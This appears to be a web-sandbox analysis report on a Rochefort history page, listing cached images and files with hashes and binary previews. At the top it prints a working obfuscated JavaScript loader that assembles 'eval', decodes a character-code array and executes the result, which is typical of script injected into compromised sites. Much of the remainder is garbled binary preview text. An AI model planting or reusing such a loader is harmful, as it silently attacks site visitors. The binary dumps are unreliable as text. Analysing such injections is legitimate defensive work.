ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,108,31,59,29,100,110,97,114,109,100,108,113,46,98,112,98,97,115,99,66,108,100,107,98,110,115,38,36,105,101,112,94,109,100,37,38,59,12,8,10,10,31,30,29,32,107,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,96,98,111,105,100,108,107,118,100,108,97,101,102,102,94,122,45,102,114,47,98,109,114,110,115,99,111,46,111,102,109,39,58,11,7,32,31,30,29,108,45,113,113,121,107,99,43,112,110,113,102,116,104,109,107,32,60,30,36,97,97,113,108,108,116,114,98,39,58,11,7,32,31,30,29,108,45,113,113,121,107,99,43,98,110,112,97,101,113,30,58,32,38,46,36,59,12,8,29,32,31,30,105,46,114,114,118,108,100,44,101,101,104,101,101,116,31,59,29,39,48,110,117,39,58,11,7,32,31,30,29,108,45,113,113,121,107,99,43,119,104,98,113,104,31,59,29,39,48,110,117,39,58,11,7,32,31,30,29,108,45,113,113,121,107,99,43,108,100,100,113,32,60,30,36,49,111,118,36,59,12,8,29,32,31,30,105,46,114,114,118,108,100,44,113,111,111,30,58,32,38,47,109,120,38,57,10,10,12,8,29,32,31,30,102,102,31,38,30,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,107,37,38,41,31,121,10,10,31,30,29,32,31,30,29,32,99,109,96,117,108,99,107,116,45,117,111,105,115,99,37,39,59,98,102,118,31,103,97,61,91,37,105,92,38,60,57,47,99,103,115,62,38,39,56,13,9,30,29,32,31,30,29,32,31,98,108,99,116,107,98,110,115,44,100,101,115,67,105,101,108,99,107,116,65,119,70,100,39,37,105,39,40,44,94,112,111,99,107,100,66,102,102,108,99,38,105,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56);}w=f;s=[];for(i=0;-i+452!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd){xz(s)}
URL: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm#anchorCPP Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To protect the Arsenal of Rochefort", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To protect the Arsenal of Rochefort", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm#anchorCPP Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm Model: Joe Sandbox AI	{ "brands": [ "Rochefort" ] }
	{ "brands": [ "Rochefort" ] }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, from Unix, original size modulo 2^32 10359
Category:	downloaded
Size (bytes):	3792
Entropy (8bit):	7.944329857359806
Encrypted:	false
SSDEEP:	96:FOC79H8vAM6aZQfuRhbBRM4EHpq5IS8uLlNfUtNgLS3DwATJ:xH8vAMpQfu3NRzESXUtwS3kATJ
MD5:	65E68CE656A635AEBA96BD54C5776FA8
SHA1:	7443128CC00B89710274A75A2AC77B7A66D21587
SHA-256:	DE58A75423175FF7A0E92DAD48EC8052CE0895B06E67503869A498B346DE8803
SHA-512:	93E97F8ECFDBF0E3B20739B52F5070DD641B2ACD8984148DBAB72C95CC6638FCC81DA59AD5EDF0DB685AFE0824C126EA00EE4E3D4004C9A494CDF4A89BA23C30
Malicious:	false
Reputation:	low
URL:	http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm
Preview:	...........Z.r...}.W.L.D..5wZ$kdE.L2^JV.JM..........&.q...9...%'..ST......r.4.hvr2Y...N&+a8[..n.O..Lk.6"6...Z.N.w7..qoZD{.%.0S...h..7.Z.(.+1.."..\......b.t(43...2"0.F.K1W..Y.v...\|...?...d.......;.R.\|..M.&f..d$..;.V26L..F.m.IG..DE.V.L.D.\|G.$.2l.A8...t.......J.v..-.......n.]$5V../.................W2.Qs.5........Z$..4...H...5..}..'-..d.r.;...1..w...8....[...+.............pm...F.]K-.I#X.1{.......[.Mk....,.5....,.~&F..w....."Ft.u.....\-X..R;..W.g.{..[..X.B.>([&....q!.OG.t..RL..Z...B&.4......v+'...........A.d..o.{Zc...).<.U......v;..8T.s.M.y.G.s9?.n.....2.......Ia>.:._.n..."L.I.8..p.>......@.n.U$....M.,...h../....g......v...I.Qk"G..t../b..e.t..>........{m..y}............W..N.........".......;..U..n..x.?=.f.,.n.7..G....>i0...v..-i.....gJ......{..c..g.[%Iy...,.)..x.........h+.......5......o....{.T".m..l..g\|....,.m...#C8....;&....r....../.Y..m...X.d..:..M.`@(k..9.zcP............y.C.....x.U{......-kT/.Jv.e.....\...-7....$..{...7U?...i..f.+

Chrome Cache Entry: 44

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 130x91, components 3
Category:	downloaded
Size (bytes):	3078
Entropy (8bit):	7.68496561514137
Encrypted:	false
SSDEEP:	48:xG69Me+IAgQtyslq/luztMRhIVStKYQXCCGjUQ4RPvFeGob7nXr37F2J:xGBbysItuKRhIFzXxyUZRPvIFz3Fs
MD5:	3CCDF02EA606F6672C2270CC5619031B
SHA1:	9CD8CA75F7300EABA984BBBB79C98F4AE984BF1E
SHA-256:	0B1A525F7AA35730BE8B3D4D0629F3E933CF3D3CB44EB1D4382C7423613F6CCB
SHA-512:	D9148F7D7C0436F3A54FB0ED1BCC65DFFCC24879ABF69015EE3049304EE784C907131B64837518E3617418A8600A8B087A8E7ECD075C1662AD714B9B5003B66A
Malicious:	false
Reputation:	low
URL:	http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Boya1.jpg
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......[....".....................................................................................-.I6V\....y..X.,...s..-E9.h.K...j...s.s..@k..;.s...j..%.Qw.KKkd....N].6.e....e...M.\|.eS.^..%_..n~:.r..Y.6.k...g.......W..^.^Vd..V&.!5%.yb..`..n}Q.X..E...I2[.R......&......................... !."12.304@..................bp.J(.+4C8...Oj.+...D\..9..{enm..An.4I....T..IbA{........r.....l.....J.....?......a....}.d........{........6....\|.`.a.vM.......}.N._...R.Oi.P.O...5.._.=7.G.c..,:..6..../9....<A2...Es..rb5...-..%.f..lOa..>B...xi.9.6,7.wi..&d...C3.Y..(vq.B{....>z.~;.O......................... 1...!........?..G.<..SGT$...R....-.b................................. .!1........?..+zrD......n..].............}#O...-.....................!. "1AQ.2aq.0@...B..R.........?..9...h.W5....+.b.5..XH*. .Tx.[_J...=...'47.r.q<...:.

Chrome Cache Entry: 45

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 312x218, components 3
Category:	downloaded
Size (bytes):	15450
Entropy (8bit):	7.949737097956396
Encrypted:	false
SSDEEP:	384:8RfAUBPnKX9s3fNzbILe7QNNmry1Imz71QOuSKFE43:8GEPnPq6s6iz75uSt43
MD5:	B921EAFC5820151C92A164A9009C095B
SHA1:	0BABF5D2590FF1F7826E2150E2DD6FB18BF597AA
SHA-256:	F052AE64B757FAC12606210D7C7389674A2F3C9BA8CDEC049DFA66835ACE646C
SHA-512:	C6A8F046C75F0B4D5B98AD134560DED5F0F83B0B9771F4295C3A14D658C03DC28D619D14F10FF6C5C6DD9B7E166D42949315696E61C4A3BC2022E2ACAD12888A
Malicious:	false
Reputation:	low
URL:	http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Boya.jpg
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........8.."...........................................................................P.O..............C... .....................k..R.`_U\o\.x.@{C.t.......Y.,...........$N.....ci.]9.H.q..K]..n......0.IF..y=..~U..).........K.........Md3H.S.v.)gK4...j.'.....4[z.t.b.NF.s.<..........'.....s]U.[..c5....}].Vp].-...K_ZT........B.$..u:\.s.:s.bl....H.=O..3VWE..u1K...;Aslh7.w..=3.U.&2.Q..4.....GX.:...@...K._=..J...\..&.k..GL...W...Fu...\....c+.?..y..s_.o,.........DO..~..JQ..>...Z.....C.....D.69.w.C.........Ga&.......G.3..=\.. $..,z.'.9...(.L.$Z..L..;...Q;5...R. .u3.d.....Z..@...x.O.j3..g{....}/..g.M..$....."g:.eic..K..-c..R.cz.t.U..S..$..h...h.gZ....{r.]S..xVf..7..H:B..BK.G.tS...i.w".S.iZoXj...I.)h..2.lk.V....j.....gy..7.....L..u...w..FpV.8m.-......64..i.P.RI:e..br.L.+...Vs..b.........X...u...Z

Chrome Cache Entry: 46

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 87a, 71 x 112
Category:	dropped
Size (bytes):	1797
Entropy (8bit):	6.525501227450159
Encrypted:	false
SSDEEP:	48:WF/mIXn3l7+ejbL/4BWgTSc9TAE0+jjnU2U:A1nHL4xTTTz0KjnU2U
MD5:	13CDBCD96D77FC68D9C9730EFCE9B551
SHA1:	E338FCC16842D609EAF1BC16215E666E41FBB483
SHA-256:	0FDAB4783CFFDD734BF31EB785CDE56AFE40F92DD26D161D31ACEC20B93A0B95
SHA-512:	6D43C844C8797F050A5F20E3B20C31F037D8182EFA6B81D5732ECB8921DB6775642210C186143A010E6CC2DFEAA37AE62A27D6D721B5CBD2CFBD9FB8D6786FE2
Malicious:	false
Reputation:	low
Preview:	GIF87aG.p...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......!..Adobe ....,....G.p........H......\....#J.H.....h.... A.......(S.\..Kd......8s....Id5):QA.h..H...d..K.J=y..S.;.....U.\oz.....W..t6.,...E&...'h.F.kr..Qy...f.A..&AQ....B..x*A.X.R.4q.._..ysY.....

Chrome Cache Entry: 47

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 130x91, components 3
Category:	dropped
Size (bytes):	3078
Entropy (8bit):	7.68496561514137
Encrypted:	false
SSDEEP:	48:xG69Me+IAgQtyslq/luztMRhIVStKYQXCCGjUQ4RPvFeGob7nXr37F2J:xGBbysItuKRhIFzXxyUZRPvIFz3Fs
MD5:	3CCDF02EA606F6672C2270CC5619031B
SHA1:	9CD8CA75F7300EABA984BBBB79C98F4AE984BF1E
SHA-256:	0B1A525F7AA35730BE8B3D4D0629F3E933CF3D3CB44EB1D4382C7423613F6CCB
SHA-512:	D9148F7D7C0436F3A54FB0ED1BCC65DFFCC24879ABF69015EE3049304EE784C907131B64837518E3617418A8600A8B087A8E7ECD075C1662AD714B9B5003B66A
Malicious:	false
Reputation:	low
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......[....".....................................................................................-.I6V\....y..X.,...s..-E9.h.K...j...s.s..@k..;.s...j..%.Qw.KKkd....N].6.e....e...M.\|.eS.^..%_..n~:.r..Y.6.k...g.......W..^.^Vd..V&.!5%.yb..`..n}Q.X..E...I2[.R......&......................... !."12.304@..................bp.J(.+4C8...Oj.+...D\..9..{enm..An.4I....T..IbA{........r.....l.....J.....?......a....}.d........{........6....\|.`.a.vM.......}.N._...R.Oi.P.O...5.._.=7.G.c..,:..6..../9....<A2...Es..rb5...-..%.f..lOa..>B...xi.9.6,7.wi..&d...C3.Y..(vq.B{....>z.~;.O......................... 1...!........?..G.<..SGT$...R....-.b................................. .!1........?..+zrD......n..].............}#O...-.....................!. "1AQ.2aq.0@...B..R.........?..9...h.W5....+.b.5..XH*. .Tx.[_J...=...'47.r.q<...:.

Chrome Cache Entry: 48

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 87a, 42 x 35
Category:	dropped
Size (bytes):	1409
Entropy (8bit):	5.8179802821627264
Encrypted:	false
SSDEEP:	24:RGF+ed4RU0T6XneYalTte5l7+ejb9B/4e2ch53wm4TYUeeldfiX23P:0F/mIXn3l7+ejbL/4tqw0le3pP
MD5:	7E0D64FB96F2B80809093879511D2D10
SHA1:	E0B4868E3731D2FB18CBD301A0FD7857275DE4AE
SHA-256:	46D8202F48C602470BED4A5F0866DD17967AF4971200E5BEAF048FFFD64810A1
SHA-512:	4725074C521205E31E156AF593F1B07D9ED7F17E26A09B962F761D814A31D3FF834659BC4BE6EBAB7C79CDB86162EA24709985D0156614DC0BC442105E677BFD
Malicious:	false
Reputation:	low
Preview:	GIF87a.#...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......!..Adobe ....!.......,.....#........H......*\......H.........1....%..Q.$F.4ft..I..h.@.....w..p...8.".....;V....F..2h.Xq.@....z..tk..:........Z,.....,H...d.d..H....-..6.X)..,d$n....li.4:.^.{...g9sf.Nw.=.

Chrome Cache Entry: 49

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 87a, 71 x 112
Category:	downloaded
Size (bytes):	1797
Entropy (8bit):	6.525501227450159
Encrypted:	false
SSDEEP:	48:WF/mIXn3l7+ejbL/4BWgTSc9TAE0+jjnU2U:A1nHL4xTTTz0KjnU2U
MD5:	13CDBCD96D77FC68D9C9730EFCE9B551
SHA1:	E338FCC16842D609EAF1BC16215E666E41FBB483
SHA-256:	0FDAB4783CFFDD734BF31EB785CDE56AFE40F92DD26D161D31ACEC20B93A0B95
SHA-512:	6D43C844C8797F050A5F20E3B20C31F037D8182EFA6B81D5732ECB8921DB6775642210C186143A010E6CC2DFEAA37AE62A27D6D721B5CBD2CFBD9FB8D6786FE2
Malicious:	false
Reputation:	low
URL:	http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Env2.gif
Preview:	GIF87aG.p...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......!..Adobe ....,....G.p........H......\....#J.H.....h.... A.......(S.\..Kd......8s....Id5):QA.h..H...d..K.J=y..S.;.....U.\oz.....W..t6.,...E&...'h.F.kr..Qy...f.A..&AQ....B..x*A.X.R.4q.._..ysY.....

Chrome Cache Entry: 50

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 87a, 42 x 35
Category:	downloaded
Size (bytes):	1409
Entropy (8bit):	5.8179802821627264
Encrypted:	false
SSDEEP:	24:RGF+ed4RU0T6XneYalTte5l7+ejb9B/4e2ch53wm4TYUeeldfiX23P:0F/mIXn3l7+ejbL/4tqw0le3pP
MD5:	7E0D64FB96F2B80809093879511D2D10
SHA1:	E0B4868E3731D2FB18CBD301A0FD7857275DE4AE
SHA-256:	46D8202F48C602470BED4A5F0866DD17967AF4971200E5BEAF048FFFD64810A1
SHA-512:	4725074C521205E31E156AF593F1B07D9ED7F17E26A09B962F761D814A31D3FF834659BC4BE6EBAB7C79CDB86162EA24709985D0156614DC0BC442105E677BFD
Malicious:	false
Reputation:	low
URL:	http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Boy.gif
Preview:	GIF87a.#...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......!..Adobe ....!.......,.....#........H......*\......H.........1....%..Q.$F.4ft..I..h.@.....w..p...8.".....;V....F..2h.Xq.@....z..tk..:........Z,.....,H...d.d..H....-..6.X)..,d$n....li.4:.^.{...g9sf.Nw.=.

Chrome Cache Entry: 51

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 312x218, components 3
Category:	dropped
Size (bytes):	15450
Entropy (8bit):	7.949737097956396
Encrypted:	false
SSDEEP:	384:8RfAUBPnKX9s3fNzbILe7QNNmry1Imz71QOuSKFE43:8GEPnPq6s6iz75uSt43
MD5:	B921EAFC5820151C92A164A9009C095B
SHA1:	0BABF5D2590FF1F7826E2150E2DD6FB18BF597AA
SHA-256:	F052AE64B757FAC12606210D7C7389674A2F3C9BA8CDEC049DFA66835ACE646C
SHA-512:	C6A8F046C75F0B4D5B98AD134560DED5F0F83B0B9771F4295C3A14D658C03DC28D619D14F10FF6C5C6DD9B7E166D42949315696E61C4A3BC2022E2ACAD12888A
Malicious:	false
Reputation:	low
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........8.."...........................................................................P.O..............C... .....................k..R.`_U\o\.x.@{C.t.......Y.,...........$N.....ci.]9.H.q..K]..n......0.IF..y=..~U..).........K.........Md3H.S.v.)gK4...j.'.....4[z.t.b.NF.s.<..........'.....s]U.[..c5....}].Vp].-...K_ZT........B.$..u:\.s.:s.bl....H.=O..3VWE..u1K...;Aslh7.w..=3.U.&2.Q..4.....GX.:...@...K._=..J...\..&.k..GL...W...Fu...\....c+.?..y..s_.o,.........DO..~..JQ..>...Z.....C.....D.69.w.C.........Ga&.......G.3..=\.. $..,z.'.9...(.L.$Z..L..;...Q;5...R. .u3.d.....Z..@...x.O.j3..g{....}/..g.M..$....."g:.eic..K..-c..R.cz.t.U..S..$..h...h.gZ....{r.]S..xVf..7..H:B..BK.G.tS...i.w".S.iZoXj...I.)h..2.lk.V....j.....gy..7.....L..u...w..FpV.8m.-......64..i.P.RI:e..br.L.+...Vs..b.........X...u...Z

Chrome Cache Entry: 52

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, from Unix, original size modulo 2^32 318
Category:	downloaded
Size (bytes):	263
Entropy (8bit):	7.1507517838210495
Encrypted:	false
SSDEEP:	6:XtzXi2Jr3F3/wHGw8NOvHW564MmhppewOrduBPAvKl:XZDl5a8mHWE4N/7m2Nl
MD5:	FF64854752F9AF31C331F6C0E909FD04
SHA1:	C3EE84532D950A5201BE263948AF0B24D839C09C
SHA-256:	4AE8133F810F4AAD19D062F06167B81B3D977E7087E426B6B815AD8A2E7142EF
SHA-512:	5750B7086436C33A8379EC5D0BBDF3E143F8FC34A728556808DB7BF9F877129D16F2F9C2F6D88AA6C0F110BB2B518C91557E8E3DA8574CD619514B4B3B6D498C
Malicious:	false
Reputation:	low
URL:	http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/M1.gif
Preview:	..........MPMo.0...+...CcZ!m.(.V.V.v...NU f Q.P....j...?...3...6.G..k.O!+^....K.].o..<.M.,DL.....;......u..(...l..+..f....V?..J...*.....C_#YG..c.xi..N.NFW...8<....r._...IZ.=Y=....5..K.B.q.f9.T...y....,b.p_.c...x..A:.....(...R.U..........wt.......5.>...

Chrome Cache Entry: 53

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 87a, 255 x 57
Category:	downloaded
Size (bytes):	2982
Entropy (8bit):	7.279829881553489
Encrypted:	false
SSDEEP:	48:FF/mIXn3l7+ejbL/4fmwL8mdma8jEHB8WKGCZfoQROO+a2jFPq/LT+jNI:F1nHL4uwLBdXee6WKGkF+a2MTwy
MD5:	49252173B9F21484BF94080F82F8EA8A
SHA1:	E4FA6CF09B1382174C17C47E7D222CDAC30D4253
SHA-256:	09CBB67598510798B816AF116A3CAE28523D04B073BAF42A44A7B76072E324E2
SHA-512:	77B3CBD2EE9EE7124BF6C0E5534CDAC5D2289EF5777224143F1B5CF1EAAAE6E6A05902B2C87D875871FFF951A0A0AFD106897FC2F7301B9804DBEB4F1B95362F
Malicious:	false
Reputation:	low
URL:	http://www.bordeaux-doc.com/ville_de_rochefort/Roch/Pict/Roch.gif
Preview:	GIF87a..9...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......!..Adobe ....!.......,......9........H......*\....#J.H....3j.... C..I...(S&...".{+b. .&.<....s'.QUlf....)... s.i.<H...IU.S.Q'.......Ve..e.E...H...<,Yfe.v.=.kK....^^.U.....).0c...u.Yg+..&X.....n.{.YL.?..l

Chrome Cache Entry: 54

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 87a, 255 x 57
Category:	dropped
Size (bytes):	2982
Entropy (8bit):	7.279829881553489
Encrypted:	false
SSDEEP:	48:FF/mIXn3l7+ejbL/4fmwL8mdma8jEHB8WKGCZfoQROO+a2jFPq/LT+jNI:F1nHL4uwLBdXee6WKGkF+a2MTwy
MD5:	49252173B9F21484BF94080F82F8EA8A
SHA1:	E4FA6CF09B1382174C17C47E7D222CDAC30D4253
SHA-256:	09CBB67598510798B816AF116A3CAE28523D04B073BAF42A44A7B76072E324E2
SHA-512:	77B3CBD2EE9EE7124BF6C0E5534CDAC5D2289EF5777224143F1B5CF1EAAAE6E6A05902B2C87D875871FFF951A0A0AFD106897FC2F7301B9804DBEB4F1B95362F
Malicious:	false
Reputation:	low
Preview:	GIF87a..9...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......!..Adobe ....!.......,......9........H......*\....#J.H....3j.... C..I...(S&...".{+b. .&.<....s'.QUlf....)... s.i.<H...IU.S.Q'.......Ve..e.E...H...<,Yfe.v.=.kK....^^.U.....).0c...u.Yg+..&X.....n.{.YL.?..l

Chrome Cache Entry: 55

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 16 x 16
Category:	dropped
Size (bytes):	875
Entropy (8bit):	4.714529527015266
Encrypted:	false
SSDEEP:	12:Yf0qZHy/wNE63xhaQqcVPq/biOTidNKHXLAt3ZWCMXl2ODJxWVS/MXzxUx9xjOop:Y8OCwNrancq/bcd6mXIlv9xHYcbOop
MD5:	927513EE48EC67BA85114B780600389C
SHA1:	6F753C4B7495D269D073890FD2DACD0B7B25CEC3
SHA-256:	8949D14D467798848A6D324182D630A0586DC0D8CAC078BB2585763FC268B250
SHA-512:	9708B65BC1FC8D529373FDB39DD2A8CFCD1DA7AE05554834B105B906518B635D647468D0D43DE32DBA00878DF16D34D334B96AB92E8D16F550B376AF84474B83
Malicious:	false
Reputation:	low
Preview:	GIF89a................w....dP........4.i.....c.....o.........\|.. ........... ........D...>..9....V......C..C............w..f.....................S..!.....w..........................8...........7....K...w.fE.........wP.........w$...........r..r..N....w..x....0...w...........wX.....K............,.w..E..........Px..........$............0.........w........,....@A.9.....w.. l..[.....w..........w...........w.............k.........w.Xx........w..........ww..........w...............H.P............(.....w.x.............l..[.....w<...P................w......)....ww..h..........jd../....ww...p......w..........K.....P...........sP.r..N....l..........d../.....ww..4.....N.....<.<...N.w...............h..........0.................O......o.5......w.i.....tG....z.....e.....r.....l....!.......,..........H....H..@...\.`.C......0...:.Q"E..1...0..%C.$).bB. =f.y.#.6..\|x....;

Chrome Cache Entry: 56

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 16 x 16
Category:	downloaded
Size (bytes):	875
Entropy (8bit):	4.714529527015266
Encrypted:	false
SSDEEP:	12:Yf0qZHy/wNE63xhaQqcVPq/biOTidNKHXLAt3ZWCMXl2ODJxWVS/MXzxUx9xjOop:Y8OCwNrancq/bcd6mXIlv9xHYcbOop
MD5:	927513EE48EC67BA85114B780600389C
SHA1:	6F753C4B7495D269D073890FD2DACD0B7B25CEC3
SHA-256:	8949D14D467798848A6D324182D630A0586DC0D8CAC078BB2585763FC268B250
SHA-512:	9708B65BC1FC8D529373FDB39DD2A8CFCD1DA7AE05554834B105B906518B635D647468D0D43DE32DBA00878DF16D34D334B96AB92E8D16F550B376AF84474B83
Malicious:	false
Reputation:	low
URL:	http://www.bordeaux-doc.com/favicon.ico
Preview:	GIF89a................w....dP........4.i.....c.....o.........\|.. ........... ........D...>..9....V......C..C............w..f.....................S..!.....w..........................8...........7....K...w.fE.........wP.........w$...........r..r..N....w..x....0...w...........wX.....K............,.w..E..........Px..........$............0.........w........,....@A.9.....w.. 